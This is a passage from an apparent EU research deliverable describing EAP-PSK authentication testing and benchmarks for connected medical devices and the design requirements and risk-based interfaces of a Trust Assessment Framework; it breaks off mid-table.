5.2 Implementation Path Report

With the **design and analysis complete**, we now focus on the **local experimental phase**. The main goal is to **verify that all processes and components work as intended** in a **realistic environment** before proceeding with broader deployment activities, which will be detailed in **Deliverable D6.2**.

To verify this main goal, we have defined **three key points** that must be checked to validate the **complete flow is working correctly**:

- **Complete process of the device authentication flow:** This point verifies that the entire authentication process is working as intended and aligns with the architecture defined in the earlier stages.
- **Mutual Authentication and Key Derivation:** This point verifies that both parties (CMD and manufacturer's AAA Server) successfully authenticate each other and derive matching cryptographic key material, such as the MSK, KDK, AK, and TEK.
- **Operation Across Local and external Networks:** This point verifies that using the CMD on the local network and the AAA Server on the manufacturer's external network does not negatively impact the authentication process. This is a simulated setup; the real-scenario deployment will be presented in the future.

5.2.1 Architecture overview

The current infrastructure for **EAP authentication implementation** is structured around **secure onboarding and management** of **low-end Connected Medical Devices (CMDs)**. It builds on a robust **zone-based deployment model** with **secure communication** and **identity-based policy**.

The architecture consists of **five principal components**, deployed across **separate physical hardware platforms** to reflect a **segmented, real-world network environment**. The **device-side components** run on a **Raspberry Pi 3**, while the **manufacturer-side components** are hosted on a **dedicated physical server** or **cloud-based infrastructure**.

Technical Details

Device-Side(Local Network-Physical Device):

- **Components:**
 - ✓ **CMD:** this component initiates the onboarding process via EAP-PSK authentication with the AAA Server. Upon successful mutual authentication, it derives the Master Session Key (MSK), serving as the secure entry point into the infrastructure.

- ✓ **Domain Manager:** Orchestrates onboarding operations between the CMD, AAA Server, and the MUD Manager. It handles secure communication, coordination, and component interfacing.
- ✓ **MUD Manager:** Post-authentication, the MUD Manager receives the CMD's Manufacturer Usage Description (MUD) URL. It retrieves, validates the MUD file, and sends it directly to the DLT.
- **Configuration:**
 - ✓ Raspberry Pi 3
 - ✓ 1 GB RAM
 - ✓ Lightweight Ubuntu OS (e.g., Ubuntu Server 24.04 ARM)
 - ✓ Broadcom BCM2837 (Quad-core ARM Cortex-A53 @ 1.2GHz)

Manufacturer-Side(Cloud-Network-Physical Server):

- **Components:**
 - ✓ **AAA Server:** Handles EAP-PSK authentication requests. It validates CMD credentials and derives the same MSK as the CMD, ensuring mutual trust.
 - ✓ **MUD Server:** Hosts official MUD files, which are accessed via client-server during onboarding to retrieve trusted policy definitions.
- **Configuration:**
 - ✓ Cloud instance or physical Linux server
 - ✓ Ubuntu Server 24.04 (or equivalent)
 - ✓ Sufficient resources to services (min. 2-core x86-64 processor and 4GB RAM)
- **Network Setup:** The Raspberry Pi is connected to a local network, while the manufacturer-side services are hosted on either an isolated physical server or cloud infrastructure accessible via a secure external network link.

5.2.2 Network Segmentation

As detailed in **Chapter 5 of Deliverable 2.2 [30]**, the core motivation of **ENTRUST** is to provide a **dynamic Trust Assessment framework** that not only covers the requirements of **medical domain applications** but also extends its applicability to **other sectors beyond healthcare**.

To support this vision, **enforce separation of concerns**, and **minimize the attack surface**, the infrastructure is **logically segmented into distinct operational zones by network**. This separation defines two main zones: **Domain** and **Manufacturer**. By **isolating components** within these zones and enforcing **strict access control** between them, the architecture **reduces potential entry points for attackers** and **improves overall system security**.

- **Domain Zone:** Components such as the CMD or MUD Manager, which run on this zone, are not directly exposed to the internet, any access to them must pass through a firewall or other security mechanisms within the Domain.
- **Manufacturer Zone:** On the Manufacturer side, the AAA Server and MUD file Server reside inside of the Manufacturer's infrastructure and network, where they are properly managed and secured.

Connection between components

Communication throughout this workflow is **encrypted** and **mutually authenticated** when needed. Traffic is secured using protocols like **TLS** or **HTTPS**. This **layered architecture** guarantees **secure initial onboarding** and **ongoing policy enforcement**, ensuring that only **trusted devices and services** operate within the **ENTRUST ecosystem**.

- **TCP:** CMD ↔ Domain Manager
- **TLS over TCP:** Domain Manager ↔ AAA Server
- **HTTPS:** Domain Manager ↔ MUD Manager

All communication throughout this workflow is **encrypted** and **mutually authenticated**. This **layered architecture** guarantees **secure initial onboarding** and **ongoing policy enforcement**, ensuring that only **trusted devices and services** operate within the **ENTRUST ecosystem**.

5.3 Benchmarking

This section provides a **detailed evaluation** of the **EAP-PSK authentication process** within the **ENTRUST project**. For **benchmarking and testing purposes**, all components have been deployed on a **single virtual machine (VM)**. This setup allows **controlled experimentation** of the system components and the **complete flow**.

Test-Bed

- **Components Deployed in the VM:**

1. **CMD:** this component initiates the onboarding process via EAP-PSK authentication with the AAA Server. Upon successful mutual authentication, it derives the Master Session Key (MSK), serving as the secure entry point into the infrastructure.
2. **Domain Manager:** Orchestrates onboarding operations between the CMD, AAA Server, and the MUD Manager. It handles secure communication, coordination, and component interfacing.
3. **MUD Manager:** Post-authentication, the MUD Manager receives the CMD's Manufacturer Usage Description (MUD) URL. It retrieves, validates the MUD file, and sends it directly to the DLT.
4. **AAA Server:** Handles EAP-PSK authentication requests. It validates CMD credentials and derives the same MSK as the CMD, ensuring mutual trust.
5. **MUD Server:** Hosts official MUD files, which are accessed via client-server during onboarding to retrieve trusted policy definitions.

- **Configuration:**

1. Hypervisor: VirtualBox
2. CPU: 4 vCPUs
3. RAM: 4 GB RAM
4. OS: Ubuntu Server 24.04 LTS

5.3.1 Benchmark Results

Measurements were taken for the **entire process** (from the initial **EAP-PSK request** to the final step, when the device sends **confirmation messages to the Domain Manager**) as well as for the performance of each component and **critical operations**, such as **material key generation**.

Tables 5.1, 5.2, and 5.3 provide **execution times** across three different parts of the system. **Table 5.1** focuses on **core device operations**, capturing the **cryptographic and communication tasks** handled by the **Device**. **Table 5.3** presents a similar set of operations performed at the **AAA Server**, specifically during **EAP challenge handling**. Meanwhile, **Table 5.2** measures the time required for the **Domain Manager (DM)** to **establish communication channels** and **exchange messages** with the **CMD** and **AAA Server**.

Metric Definitions

This section defines the **performance metrics used across the different evaluation tables**. While some metrics are shared between tables, others are specific to individual components or flows.

System Initialization

- **Initialization time (ms)**: Time required to start a component, initialize internal state, and be ready to send or receive messages.

Preparation and Randomness

- **Random material gen. (ms)**: Time to generate random values such as IDs or nonces required during authentication and key generation.
- **Build message (ms)**: Time to create a protocol-specific message (e.g., an EAP challenge).

Connection Setup

- **Connection setup time (ms)**: Time to establish a communication channel between components.

Message Transmission

- **Send message latency (ms)**: Time to serialize, encrypt, transmit, and confirm delivery of a message over an established channel. Measured for:

Authentication and Key Generation

- **Verification credentials (s)**: Time required to verify authentication credentials received from other component.
- **Key material derivation (s)**: Time to derive cryptographic session keys (e.g., MSK) from exchanged material between components.

Overall Execution

- **Total execution time (s)**: Total time to complete all steps in a given scenario, from initialization to final key generation and final ACK message exchange.

Results

Metric scenario	Test 1	Test 2	Test 3	Test 4	Test 5	Median
Initialization time (ms)	0.0022	0.0018	0.0022	0.0030	0.0049	0.0022
Random material gen. (ms)	0.0227	0.0205	0.0225	0.0249	0.0283	0.0227
Send message latency(CMD-DM) (ms)	0.8549	0.7932	0.7780	0.7793	0.7770	0.7793
Verification credentials (s)	1.2901	1.2009	1.1736	1.1416	1.2117	1.2009
Key material derivation (s)	1.9488	1.7803	1.7852	1.7142	1.8245	1.7852

Table 5.1: CMD: Authentication, Key Material Generation, and Communication Times

Metric scenario	Test 1	Test 2	Test 3	Test 4	Test 5	Median
Connection setup time(DM-CMD)(ms)	10.1240	0.0910	0.0870	0.0760	0.0820	0.0870
Send message latency(DM-CMD)(ms)	3.4250	4.2350	3.0410	5.3780	6.8480	4.2350
Connection setup time(DM-AAA)(ms)	4.0020	3.2120	3.1970	4.3390	2.6620	3.2120
Send message latency(DM-AAA)(ms)	50.1600	47.8170	48.7600	50.1950	48.2920	48.7600
Connection setup time(DM-MUD.M)(ms)	202.7500	203.5670	202.7660	202.7320	204.0600	202.7660
Send message latency(DM-MUD.M)(ms)	207.5680	208.7290	207.8110	207.0570	210.4800	207.8110
Total execution time (s)	6.2700	5.5953	5.9694	5.5287	6.0559	5.9694

Table 5.2: Domain Manager: Execution and message exchange

Metric scenario	Test 1	Test 2	Test 3	Test 4	Test 5	Median
Initialization time (ms)	0.0790	0.0560	0.0620	0.1870	0.0530	0.0620
Build message (ms)	0.1140	0.0980	0.1390	0.0820	0.1770	0.1140
Send message latency(AAA-DM)(ms)	0.0620	0.0590	0.0760	0.0430	0.0770	0.0620
Key material derivation (ms)	0.0610	0.1660	0.1720	0.0970	0.1960	0.1660
Total execution time (s)	2.8448	2.1721	2.5453	2.1043	2.6259	2.5453

Table 5.3: AAA Server: Execution, Messaging, and Key Material Generation

5.3.2 Discussion of Benchmark Results

The benchmark results show **clear performance differences** between the system’s components and workflows. **Core operations** like **key derivation** and **credential verification** are handled efficiently, but **communication with the MUD Manager** introduces noticeable overhead.

The **most significant delays** occur when the **MUD Manager** is involved in the flow. Establishing a connection between the **Domain Manager (DM)** and the **MUD Manager** takes around **202 ms**, and sending a message adds another **207 ms**. In contrast, the **DM–CMD connection setup** is almost instantaneous (under **0.1 ms**), and **DM–AAA messaging**, even with TLS, remains around **48 ms**. The elevated **MUD times** are likely due to the use of **HTTPS** and interactions with **external services**, such as retrieving **MUD files** and submitting data to the **Distributed Ledger**. In real-world scenarios, these **delays could be even greater** and **pose a problem in the future**.

This **performance gap** is also presented in the **overall execution times**. The full scenario involving **MUD integration** has a **median duration** of about **5.97 seconds**. In comparison, the flow involving the **AAA server** completes in roughly **2.54 seconds**, and **cryptographic steps** in the **CMD** complete in under **2 seconds**. These differences highlight that, although the system is **functionally complete and secure**, the **MUD-related processes** could benefit from **optimization**—for example, by **reusing connections** or **caching external resources**.

On the other hand, **cryptographic functions** performed by **CMD and AAA**, like **key derivation**, remain **consistent and efficient** across tests. This suggests that the **core security mechanisms** are **well implemented**, and most delays are due to **communication overhead** rather than computation.

Finally, the **benchmarks confirm** that the system **performs well overall** but point to **clear opportunities for reducing latency** between some components, particularly in the **MUD part**.

5.3.3 Roadmap

The system has **successfully passed evaluation testing**, covering key areas such as **mutual EAP-PSK authentication**, **correct key derivation**, and **MUD file retrieval**. These tests **validated the complete workflow** across all main components, including the **CMD, AAA Server, and MUD Manager**.

In **Deliverable D6.2**, the focus will be on **implementing the system for real-world deployment**, where the complete **EAP authentication and MUD flow** must operate **smoothly and reliably** under real conditions. To support this, the current system will be **improved by addressing areas where latency can be reduced and component coordination enhanced**.

In addition, several **key areas have been identified** to improve the **overall quality of the platform**:

- **Failover Validation:** Test failover handling and authentication continuity in scenarios where the primary AAA Server becomes unavailable during bootstrapping.
- **Load Testing with Multiple Devices:** Simulate onboarding of multiple devices with varying boot times to assess system performance, queue management, and consistency in key derivation and policy application.
- **High Availability:** Configure multiple AAA Server instances to synchronize securely and manage failover via virtual IP.
- **Monitoring and Logging:** The Domain Manager is the central control point and must log all changes and events within the domain.
- **Reduce MUD flow Latency:** Optimize the performance of the MUD-based policy retrieval and submission process. This may include reusing secure connections, caching validated MUD files, or minimizing external service calls to reduce end-to-end delay.

These **next steps** will help enhance the system's **overall stability and readiness**, while also **guiding future improvements** and ensuring **long-term adaptability**.

Chapter 6

Trust Assessment

6.1 Overview

The main goal of considering an overarching Trust Assessment Framework (TAF) is to assess the level of trustworthiness of entities with respect to a specific scope. The scope can be a property, such as the *integrity* of data. In this case, the TAF is assessing how trustworthy it is that the data has not been compromised. That said, the TAF is conceptually a reactive software system that receives incoming messages that provide updates about the trustworthiness of surrounding environment or relevant entities. These updates are then processed and integrated into an internal representation of trust sources, trust opinions, and relationships as part of trust models. At the same time, the TAF provides a service to other applications and entities by providing access to its trustworthiness assessment based on these internal representations and derived information. The full documentation of the core trust assessment terminologies as well as the detailed component ENTRUST TAF architectural description is presented in [25].

Overall, the internal specification of the ENTRUST TAF concepts and architecture is documented in [25]. In this chapter the goal is to report any updates in the interfaces of the ENTRUST TAF framework that allows trust assessment computations to run a distributed manner, forming a federation of trust assessment agents. In addition to the extensions to support the ENTRUST TAF federation scheme, the remainder of this chapter aims to document the implementation details for this second version ENTRUST TAF as a service. Finally, Section 6.9 extends the evaluation performed in the context of the first version of the ENTRUST integrated framework [28] and presents crucial insights pertaining to the run-time performance and scalability of the ENTRUST TAF in a standalone mode of operation.

6.2 System Design

This section provides a high-level overview of the second version of the ENTRUST TAF, including its internal components and interfaces. This will provide a conceptual overview of the process followed for the calculation of the ATL of a device based on a set of trust evidence. Note that the positioning of the TAF within the overall ENTRUST framework and its high-level functionality towards performing Trust Assessment in ENTRUST has already been outlined. Here, we essentially zoom into these workflows, by analyzing the inner workings of the Trust Assessment process. A high-level depiction of the architecture of the TAF is provided in Figure 6.1, where the TAF receives a **Trust Assessment Request (TAR)**, as well as the appropriate **trust evidence** associated with the request, and makes a decision on the trustworthiness of the device.

Figure 6.1: High-level architecture of the Trust Assessment Framework (TAF)

This includes the five main components: Trust Model Manager, Trust Source Manager, Trust Assessment Manager, Trust Decision Engine, and Trustworthiness Level Expression Engine. The illustration also shows the three main internal interfaces of the TAF, namely the Trust Model Instance API (TMI_API) and the interfaces for the TLEE Invocation (TLEE_Invoke) and the TDE Invocation (TDE_Invoke). In addition, the six external interfaces and services are depicted – the Trust Assessment Service (TAS), the Trust Assessment Query Interface (TAQI), the ENTRUST DLT (ENTRUST-DLT), the Evidence Collection Interface (ECI), and the Node Discovery Interface (NDI).

The TAF is internally organized as a modular system consisting of different components, as illustrated in the high-level architecture in Figure 6.1. The *Trust Model Manager* (TMM) provides an internal repository of available trust models and instantiates appropriate trust model instances upon application requests. Furthermore, it manages the full life cycle of all trust model instances by incorporating potential changes. The *Trust Source Manager* (TSM) maintains a list of possible trust sources that could be used as evidence for assessing the trustworthiness of an entity. By continuously assessing evidence from external trust sources, the TSM dynamically incorporates trust opinions into existing trust model instances. The *Trustworthiness Level Expression Engine* (TLEE) takes a trust model instance as an input and assesses the level of trustworthiness of the included propositions. The *Trust Decision Engine* (TDE) eventually forms trustworthiness and trust decision based upon output from the TLEE. Finally, the *Trust Assessment Manager* (TAM) is a central component that orchestrates updates from the TMM & TSM and schedules TLEE computations and TDE invocations. The TAM also implements external interfaces so that the trust assessment service of the TAF can be accessed by applications.

6.2.1 Standalone Trust Assessment Framework

A Standalone Trust Assessment Framework is a TAF that is executed on the ENTRUST cloud and quantifies received evidence *centrally*. The trust assessment is executed within the TAF, based on information the TAF has received, quantified, and assessed *locally*. The standalone TAF does not incorporate trust information provided by another TAF and is thus independent from other TAFs. However, the entities pro-

viding information the TAF are not located in the TAF. These are external entities, such as a misbehavior detection system.

6.2.2 Federated Trust Assessment Framework

A federated TAF has the same capabilities as a standalone TAF, but in addition, it can also exchange trust information with other TAFs. The federated TAF could be used in scenarios, where a single node does not have access to the relevant evidence necessary to calculate a trust opinion. Thus, the federated TAF concept enhances the scope of a single, local TAF by exchanging trust information with other TAFs and this enables more comprehensive trust assessments to be made and involve multiple TAFs.

6.3 System Requirements and Specifications

This section focuses on the various requirements that dictate the development and behaviour of an overarching Trust Assessment Framework. These requirements delineate both the internal operations of the internal trust assessment architecture as well as the interactions with the rest of the ENTRUST enablers. Overall, the requirements can be split into two core categories: functional and non-functional requirements.

6.3.1 Functional Requirements

In what follows, we present the final version of functional requirements. This version includes the requirements initially specified in [25]. Building on top of them, the requirements are extended to address two additional inherent challenges of the ENTRUST Trust Assessment Framework. First of all, a newly introduced requirement refers to the expression of robust trust-related constraints which introduce the need for a generic RTL methodology to support dynamic CMD topologies with heterogeneous types of medical devices. In addition, to address the level of complexity of dynamic trust models spanning across different CMD topologies and healthcare organizations, the list of requirements is extended to incorporate the transition from a central TAF component to a federation of TAF agents spanned across the various stakeholders characterized in a trust model.

For each specified functional requirement, we detail the corresponding mechanisms that have been designed and implemented to support it. Where the requirement was addressed in the first release, we highlight any updates or improvements made in this second version. This ensures clear traceability of enhancements and continued alignment with evolving system needs.

Offloading of Trust Assessment: The TAF provides trust assessment as a service for co-located applications. By offloading the trust-related tasks to the TAF, an application can focus on its original tasks and rely on the TAF for any trust assessments. This functionality is implemented from the first release of the ENTRUST integrated framework. Specifically, as documented in the first evaluation of the use cases in [25], the TAF service is deployed as a centralized application running in the ENTRUST cloud. In this standalone modality, the ENTRUST TAF component receives all necessary trustworthiness evidence from the underlying CMD topology, and all trust-related information are offloaded outside of the CMD resources.

Support for a Range of Trust Sources: As already mentioned, the overall goal of the ENTRUST TAF is to assess the trustworthiness of the CMD topology. This assessment is tailored to particular security properties that aim to monitor particular threat models. Depending on the employed threat model,

the ENTRUST TAF computations may need to rely on different types of Trust Sources to collect the relevant trustworthiness evidence and quantify the necessary ATL values. These trust sources can be local to the CMD topology and/or remote (e.g., services that run in the ENTRUST cloud and processing the available raw traces that are extracted from the CMD topology). Of course, different trust sources may require different communication styles and interaction patterns for collection. In the context of ENTRUST, core Trust Sources for the evidence-based ATL calculations include the ENTRUST Attestation mechanisms (see [26]) and the AI Misbehavior Detection (see Chapter 3).

Transforming Evidence into Trust Measures: One critical requirement for the internal operation is the quantification of trustworthiness evidence into trust opinions. This is crucial as in both TAF modalities - i.e., standalone and federated. For instance, in the evaluation presented in the first ENTRUST integrated framework ([28]), the central TAF component aims to discount the trust opinion that each CMD high-end device has on its topology. At the same time, as explained in Section 6.4, it is also critical to aggregate trust opinions from multiple agents so as to derive a final trust opinion for a specific device or data. This requires the identification of quantification mechanisms that allow the mapping of trustworthiness evidence into Subjective Logic trust opinions, which will allow the ENTRUST TAF to aggregate opinions from different agents and to compute the target trust propositions for the CMD topology. Overall, there are various trust quantification functions that can support different needs and requirements. Details on the implemented and refined trust quantification functions as part of this release are presented in Section 6.7. In addition to that, part of this requirement is related to the extensibility of these functions. The current design of the ENTRUST TAF accommodates the specification of additional trust quantification functions as part of the trust model implementation.

Dynamic Trust Modelling: The majority of the envisioned topologies across the ENTRUST use cases can be represented with a static trust model. This implies that the expressed trust relationships between the various connected medical devices are unchanged throughout the operational phase of the CMD topology. Of course, the trust opinions may fluctuate during the operational phase of the CMD topology, but the trust relationships that need to be monitored remain consistent. However, as expressed in the smart ambulance use case in [28] (i.e., Demonstrator #3.1), there are cases that are highly in the sense that they evolve, and the nodes and their relationships change over time. As part of the first release of the ENTRUST integrated framework, we focus our implementation (and evaluation) in the runtime evolution of the trust model as smart ambulance nodes get enrolled in (or detached from) the target CMD topology. Nevertheless, it is crucial to highlight that the dynamicity in the trust models needs to also accommodate the temporal evolution of the measured trust opinions. Both dimensions of dynamicity can be supported in the ENTRUST TAF component and depend only on the development of the target trust model to be evaluated.

Application Generalization: The TAF should be generic enough to be applicable in different scenarios. Such a generalizable TAF would be much more widely applicable and would reduce or eliminate customization effort for each use case and could even be updated for use in a completely novel use case. As part of the initial development of the ENTRUST TAF design, the goal is to decouple the core functionalities of the trust calculations with the generalization of the processes with respect to enabling multiple degrees of extensibility. Specifically, application developers that want to integrate trust characterization as part of their decision making process are able to express the envisioned trust model (e.g., considering different Subjective Logic Discounting operators to aggregate trust opinions) as well as the trust sources that are relevant for their application. In addition, the ENTRUST TAF is able to accommodate different modes of trust assessment requests: either periodical trust reports or notifications upon a change in the trust level in one of the monitored trust propositions.

Configurability & Customizability: Based on different use cases and runtime environments, the ENTRUST TAF requires configuration parameters to allow for certain trade-offs to address the requirements mentioned above. For instance, in the case of resource limitations or for use cases

with many concurrently occurring entities, a TAF configuration should allow to trade accuracy for timeliness (e.g. by micro-batching updates under high load) or to trade lower response latencies for higher memory consumption (e.g. by extensively caching results). In addition, individual components of the TAF should be modularized so they can be swapped easily. This would allow for customized or optimized components for specific use cases or dedicated runtime environments.

Federation of Trust Models: The proper execution of standalone TAF component deployed in the ENTRUST backend implies the availability of fresh and observable trustworthiness evidence from the underlying CMD topologies. However, most of the times this can be considered an ideal (non-realistic) scenario for a variety of reasons: from network conditions up to privacy concerns both with respect to the CMD topologies and the data flowing through them. Hence, one approach to tackle these challenges lies in the transition to a more distributed trust assessment framework forming a federated ENTRUST TAF ecosystem. Instead of sharing sensitive trustworthiness evidence with the ENTRUST cloud, this federation allows local trust-related calculations to take place either in a CMD topology level (e.g., in the highend device of a CMD topology), as well as in a healthcare organization level (e.g., in the organization’s backend accessing data of the smart ambulance operation as part of this organization’s topology). More details behind the motivation of the federation mode of operation are presented in Section 6.4, while the design and implementation information is reported in Section 6.4.2. The design details of the federation mode of operation are presented in Sections 6.5 and 6.6.

Generic RTL methodology: One critical aspect of the overall trust assessment framework refers to the ability to compare the evidence-based, runtime trust calculations (i.e., ATL values) with a set of requirements/constraints that are identified during the design phase of the overall ENTRUST architecture (see [30]). Consequently, at its core, this requirement introduces the need for an abstract methodology to derive the subjective and context-dependent requirements for any arbitrary organization. This is intrinsically linked to the fact that different healthcare organizations may want to specify different requirements (e.g., trust thresholds) in order to make an informed decision on the trustworthiness of a CMD entity. Of course, it is of paramount importance to ensure that the methodology yields a set of RTL constraints that are comparable with respect to the evidence-based, computed ATL values during runtime. Of course, there are multiple approaches to tackle this problem of determining a generic approach towards the RTL definition. In Section 6.3.3, we consider the employment of risk analysis information as the common denominator for deriving both the ATL and the RTL values. Based on a thorough risk analysis on its CMD entity individually but also on the envisioned CMD topology, the Security Administrator is able to identify the set of trustworthiness evidence that need to be monitored (i.e., linked to the ATL calculations) during the operational phase in order to ensure that the risk posture of the topology remains under accepted levels (i.e., the accepted levels are reflected in the RTL calculations). As part of this second version of the ENTRUST Risk Assessment Engine, we investigate the necessary threat analysis capabilities and interfaces that need to be deployed in order to enable these risk-aware RTL calculations.

6.3.2 Non-Functional Requirements

Non-functional requirements define quality attributes and constraints that the TAF must fulfill. The non-functional requirements for the TAF are described in the following:

Run-time performance: The TAF is intended for CMD topologies are critical in terms of time and safety. Therefore, the TAF should be able to assess the trustworthiness of an entity, which can be a node or data item, within the specific time constraints set by the application. The reason for this is that the decisions of the management of the CMD topologies should be made based on the output of

the TAF. Therefore, the TAF must be fast enough to not cause unacceptable delays in the decision-making process which could lead to safety issues.

Scalability: Both the scale of trust models and the scale of scenarios may vary a lot between different use cases the TAF is applied to. This means that the TAF needs to be able to successfully operate despite varying rates of incoming messages, varying numbers of applications that use the service of the TAF, varying levels of dynamicity and complexity of individual trust models, and varying numbers of entities that have to be assessed in these models. Hence, scalability is a key requirement for the TAF.

Efficiency: Given the critical functionality of the TAF, it is important that updates received by the TAF are reflected as fast as possible in the trustworthiness assessment calculated the TAF. As the actual worth of assessments substantially depends on the timeliness of their availability, low processing delays are mandatory. At the same time, the runtime environment of the TAF might be resource-constrained so that computational efficiency is vitally important.

Resilience: There are many ways to attack the TAF itself, resulting in the TAF providing incorrect output or no output at all. Such attacks could be aimed at changing the trust relationships, the trust sources considered, or the trust opinions between two entities. Therefore, the TAF should include mechanisms to be resilient against possible attacks on its operations.

Security: Given the critical functionality of the TAF, it is important that its processing and results are protected in terms of their integrity from malicious manipulation. Furthermore, confidentiality may be a requirement as far as the trust model and values may provide insights into topologies and systems that should not be public.

6.3.3 Risk-aware RTL derivation

The realization of a robust Trust Assessment Framework is based on the careful and accurate specification of all the trust relationships between the components that comprise the target CMD topology under evaluation. As demonstrated in 6.4, it becomes apparent that the same pieces of trustworthiness evidence have a different impact on organizations with different trust requirements. At its core, this specification relies on a thorough risk analysis that needs to take place both during the design phase of the target CMD ecosystem but also throughout its life-cycle so as to get an up-to-date view on the inflicted risk of the topology. In fact, this can be observed by the fact that both the ATL configuration - i.e., the weights in the evidence quantification functions - and the RTL equations are based on the maximum risk that is identified in the system. Hence, the execution of a proper threat analysis and risk assessment in the target environment constitutes a core enabler in the realization of the trust decision engine, linking together the context behind the RTL and ATL values.

The importance of accurately characterizing the risk associated with the target system within the broader TAF pipeline is underscored by the structure of the risk assessment lifecycle. First, the Security Administrator shall provide a detailed component diagram that models the CMD topology under evaluation. This step involves identifying all relevant assets and their inter-dependencies as well as specifying all plausible attack paths that could lead to one or more forms of system damage.

Based on these risk scenarios, the Security Administrator shall then determine an appropriate risk treatment strategy — deciding which risks require mitigation through the enforcement of security controls and which may be accepted. This decision ultimately leads to the specification of the accepted (residual) risk level under which the target CMD topology is allowed to operate. Within this context, RTL constraints represent the threshold values — such as the minimum acceptable belief level in subjective logic terms — that define acceptable runtime conditions. Subsequently, the ATL values computed at runtime offer an evidence-based estimation of the actual trust level, enabling the Security Administrator to determine —

within a defined margin of uncertainty — whether the system continues to operate within the bounds of the accepted risk level.

This introduces the need for the ENTRUST RA Engine that not only provides the base functionalities to perform the necessary risk assessment tasks, but also enables the realization of the ATL and RTL calculations as part of the overall Trust Assessment Framework. Building on the foundation established in the initial version of the ENTRUST RA Engine presented in [25], this updated release introduces significant improvements in both functionality and integration capabilities, with a particular focus on the enablers of the RTL calculations and eventually the overall trust assessment framework.

6.3.3.1 Enhanced Threat Modelling for up-to-date RTL calculations

The foundation of an accurate risk assessment processes lies in a detailed and continuous threat analysis. This threat analysis shall be able to capture well-known of all the hardware/software assets that comprise the CMD topology, the intrinsic threats tailored to a healthcare organization as well as the possible cascading attacks that can be realized by an adversary that may leverage the unique characteristics of a target CMD topology. This is essential both for the accurate overview on the security posture of the CMD topology but also for the definition of attainable RTL constraints that will enable a robust trust assessment framework. These RTL constraints will be able to capture the threshold in the trust levels for each device to conform to the domain manager's requirements.

In the context of the ENTRUST RA Engine, the threat analysis process, tailored to the characteristics and threats of the CMD ecosystem, is accomplished by the ENTRUST Threat Modelling component (see 7). In its core, the ENTRUST Threat Modelling component offers important cyber threat intelligence information regarding each asset (i.e., both hardware and software) in the CMD topology. This is achieved through the use of well-established CTI repositories that allow the association of generic threats and vulnerabilities to each asset in the topology. At the same time, through the use of AI-assisted methodologies, the ENTRUST Threat Modelling component enables the instantiation of generic vulnerabilities - that are identified in generic-purposes assets comprising the topology - into concrete attack path scenarios. These are not only tailored to the CMD domain, but also to the target application deployed on top of this exact CMD topology. Through this analysis it is possible to reveal potential cascading attacks where adversaries can exploit one threat as an entry point to launch more complex, prolonged attacks that may compromise additional assets across the topology.

This enhanced threat analysis enables fine-grained risk calculations, allowing for a more accurate definition of the RTL constraints required by each CMD asset during its operational phase. By providing the ENTRUST RA Engine with this detailed information, the impact of identified attack paths on overall RTL calculations can be assessed. Determining how these attack paths influence RTL calculations — and whether they can guide the definition of appropriate constraints for vulnerable CMD assets in critical positions in the topology — constitutes one open question for further research.

Based on the above, it becomes clear that the ENTRUST Threat Modelling tool requires access to the CMD topology in order to carry out its threat analysis operations. As documented in the full set of interfaces offered by the ENTRUST RA Engine in [25], the exposed `ASSET_MODELLING_INTERFACE` allows the consumption of information pertaining to intrinsic asset characteristics (e.g., Common Product Enumeration identifier that is crucial for searching associated threats and vulnerabilities in CTI repositories) as well as topology information in the form of graph that captures the interdependencies between the assets in the CMD topology. As part of this second version of the ENTRUST RA Engine, we have extended the `VULNERABILITY_THREAT_INTERFACE` collection of endpoints (Table 6.1) to support the consumption of the threat analysis results as derived from the ENTRUST Threat Modelling operations.

The technical details on the payload incorporated as part of this HTTP POST request are reported in Chapter 7.

Name: VULNERABILITY_THREAT_INTERFACE			
Description	Interface offered by the Vulnerability and Threat Modeling Component for managing threats, vulnerabilities. This is essential for enabling the threat analysis prior to any risk assessment task.		
Component providing the interface	Vulnerability and Threat modeling component		
Consumer components or External Entities	Risk Quantification Engine, OLISTIC Backend, OLISTIC Frontend, ENTRUST Threat Modelling		
Type of interface	REST		
Input /Output Data	Methods or endpoints of the interface	Parameters of the method	Return Object or Values of the method
	GET /api/v1/vulnerabilities /{id}	Vulnerability Identifier	Vulnerability Information
	POST /api/v1/vulnerabilities /{id}	Vulnerability Information	Vulnerability Identifier and name
	DELETE /api/v1/vulnerabilities /{id}	Vulnerability Identifier	HTTP OK
	GET /api/v1/threats /{id}	Threat Id	Threat information
	POST /api/v1/threats /{id}	Threat Information	Threat Identifier and name
	DELETE /api/v1/threats /{id}	Threat Identifier	HTTP OK
	POST /api/v1/entrust/threat-modelling	see Chapter 7	HTTP OK

Table 6.1: Vulnerability and Threat Modeling component API (Extended to accommodate the ENTRUST Threat Modelling information)

6.3.3.2 Transitioning from Risk Assessment results to RTL constraints

Moving from the ATL Methodology towards a complete trust assessment framework, it is important to express the trust requirements in a way that allows comparison of a computed ATL opinion with defined RTL constraints. As presented in the federation example of Section 6.4, it becomes evident that the same pieces of evidence have different impact in organizations with different trust requirements. In the RTL terminology this could be expressed as different RTL constraints expressing the minimum belief threshold or the uncertainty modelling.

Overall, the derivation of a trust decision - i.e., the result of the comparison between ATL and RTL values - is intrinsically linked to the accepted risk that the trustor is willing to take, with respect to the fact that a trustee behaves as expected in a given context. As part of a holistic risk assessment framework, the implementation of all security controls aims to reduce the overall risk to an accepted level. This could be the common denominator for deriving on one hand the RTL (e.g., the maximum level of risk that can be considered as accepted) and on the other hand the ATL value based on evidence indicating the enforcement of the specified security controls and/or the residual risk remaining at accepted levels.

One core characteristic of the ENTRUST TAF calculations is that the resulted trustworthiness results the whether an entity exhibits an expected target behaviour in a given context. This highlights the need for the ATL results to reflect a specific trust property, not necessarily the entity in its entirety. For instance, a CMD high-end device may provide the necessary evidence to have a satisfying ATL value with respect to its integrity but not in terms of confidentiality. Similarly, this distinction is also applicable in the context of the RTL methodologies. Hence, to enable the derivation of accurate and comparable RTL methodologies it is important to enable the availability of risk-related information in a fine-grained fashion. At the same time, the risk assessment results should be able to express the impact of the applied security controls in each risk scenario that is identified in the CMD topology. This contributes heavily to the identification of the maximum risk that can be associated with an asset which in turn can help determine the RTL constraints that need to be satisfied by each asset in the CMD topology in order to be considered conformant with the domain manager's requirements.

Based on the aforementioned requirements, the ENTRUST RA Engine has been updated so that it can support these types of reporting capabilities as part of its second version of the RISK_QUANTIFICATION

_ENGINE_INTERFACE endpoints. As shown in Table 6.2, the newly introduced HTTP POST request allows the querying of risk scenarios across multiple risk assessment iterations. This allows narrowing down the set of risk scenarios for a particular trust property and a particular asset.

Name: RISK_QUANTIFICATION_ENGINE_INTERFACE			
Description	Interface offered by the risk quantification engine that coordinates risk assessment tasks from the submission to their completion		
